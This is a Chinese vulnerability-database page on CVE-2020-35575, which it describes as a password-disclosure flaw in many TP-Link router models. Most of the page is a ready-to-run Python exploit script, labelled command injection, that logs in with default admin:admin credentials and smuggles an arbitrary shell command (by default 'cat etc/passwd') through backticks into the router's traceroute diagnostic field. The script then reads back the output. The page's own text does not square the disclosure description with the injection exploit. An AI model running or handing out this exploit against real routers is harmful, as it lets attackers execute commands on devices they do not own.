文章目录[隐藏]
多款 Tp-Link 路由器产品信息泄露漏洞
| 漏洞ID | 2292330 | 漏洞类型 | 信息泄露 |
| 发布时间 | 2021-06-25 | 更新时间 | 2021-06-25 |
 CVE编号 |
CVE-2020-35575 |  CNNVD-ID |
CNNVD-202012-1558 |
| 漏洞平台 | N/A | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
Tp-link TP-Link TL-WR940N等都是中国普联(Tp-link)公司的产品。TP-Link TL-WR940N是一款无线路由器。TP-Link WR1043nd是一款无线路由器。TP-Link TL-WR841N是一款无线路由器。TP-Link TL-WR740N是一款无线路由器。Tp-Link MR3420等都是中国普联(Tp-Link)公司的产品。Tp-Link MR3420是一款无线路由器。Tp-Link MR6400是一款无线路由器。Tp-Link WA701ND是一款无线路由器。Tp-Link WA801ND是一款无线路由器。Tp-Link WDR3500是一款无线路由器。Tp-Link WDR3600是一款无线路由器。Tp-Link WR1045ND是一款无线路由器。Tp-Link WR741ND是一款无线路由器。Tp-Link WR749N是一款无线路由器。Tp-Link WR802N是一款无线路由器。Tp-Link WR841HP是一款无线路由器。Tp-Link WR840HP是一款无线路由器。Tp-Link WR842N是一款无线路由器。Tp-Link WR842ND是一款无线路由器。Tp-Link WR845N是一款无线路由器。Tp-Link WR941HP是一款无线路由器。Tp-Link WR945N是一款无线路由器。Tp-Link WR949N是一款无线路由器。Tp-Link WRD4300是一款无线路由器。 TP-Link 多款产品存在安全漏洞,该漏洞源于web界面的密码泄露,远程攻击者可利用该漏洞获得对web面板的完全管理访问权。以下产品及版本受到影响:WA901ND devices before 3.16.9(201211) beta, and Archer C5, Archer C7, MR3420, MR6400, WA701ND, WA801ND, WDR3500, WDR3600, WE843N, WR1043ND, WR1045ND, WR740N, WR741ND, WR749N, WR802N, WR840N, WR841HP, WR841N, WR842N, WR842ND, WR845N, WR940N, WR941HP, WR945N, WR949N, and WRD4300 devices.
|漏洞EXP
# Exploit Title: TP-Link TL-WR841N - Command Injection
# Date: 2020-12-13
# Exploit Author: Koh You Liang
# Vendor Homepage: https://www.tp-link.com/
# Software Link: https://static.tp-link.com/TL-WR841N(JP)_V13_161028.zip
# Version: TL-WR841N 0.9.1 4.0
# Tested on: Windows 10
# CVE : CVE-2020-35575
import requests
import sys
import time
try:
_ = sys.argv[2]
payload = ' '.join(sys.argv[1:])
except IndexError:
try:
payload = sys.argv[1]
except IndexError:
print("[*] Command not specified, using the default `cat etc/passwd=`")
payload = 'cat etc/passwd'
# Default credentials is admin:admin - replace with your own
cookies = {
'Authorization': 'Basic YWRtaW46YWRtaW4='
}
headers = {
'Host': '192.168.0.1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko=/20100101 Firefox/84.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'text/plain',
'Content-Length': '197',
'Origin': 'http://192.168.0.1',
'Connection': 'close',
'Referer': 'http://192.168.0.1/mainFrame.htm',
}
data1 = \
'''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\r\nmaxHopCount=20\r\ntimeout=50\r\nnumberOfTries=1\r\nhost="`{}`"\r\ndataBlockSize=64\r\nX_TP_ConnName=ewan_ipoe_d\r\ndiagnosticsState=Requested\r\nX_TP_HopSeq=0\r\n'''.format(payload)
response1 = requests.post('http://192.168.0.1/cgi?2', headers=headers, cookies=cookies, data=data1, verify=False)
print('[+] Sending payload...')
try:
response1.text.splitlines()[0]
except IndexError:
sys.exit('[-] Cannot get response. Please check your cookie.')
if response1.text.splitlines()[0] != '[error]0':
sys.exit('[*] Router/Firmware is not vulnerable.')
data2 = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n'
response2 = requests.post('http://192.168.0.1/cgi?7', headers=headers, cookies=cookies, data=data2, verify=False)
print('[+] Receiving response from router...')
time.sleep(0.8) # Buffer time for traceroute to succeed
data3 = '''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\ndiagnosticsState\r\nX_TP_HopSeq\r\nX_TP_Result\r\n'''
response3 = requests.post('http://192.168.0.1/cgi?1', headers=headers, cookies=cookies, data=data3, verify=False)
if '=:' in response3.text.splitlines()[3]:
print('[-] Command not supported.')
else:
print('[+] Exploit successful!')
for line_number, line in enumerate(response3.text.splitlines()):
try:
if line_number == 3:
print(line[12:])
if line_number > 3 and line != '[error]0':
print(line)
if 'not known' in line:
break
except IndexError:
break
|参考资料
来源:nvd.nist.gov
链接:https://nvd.nist.gov/vuln/detail/CVE-2020-35575
本文由 华域联盟 原创撰写:华域联盟 » 多款 Tp-Link 路由器产品信息泄露漏洞
转载请保留出处和原文链接:https://www.cnhackhy.com/104021.htm
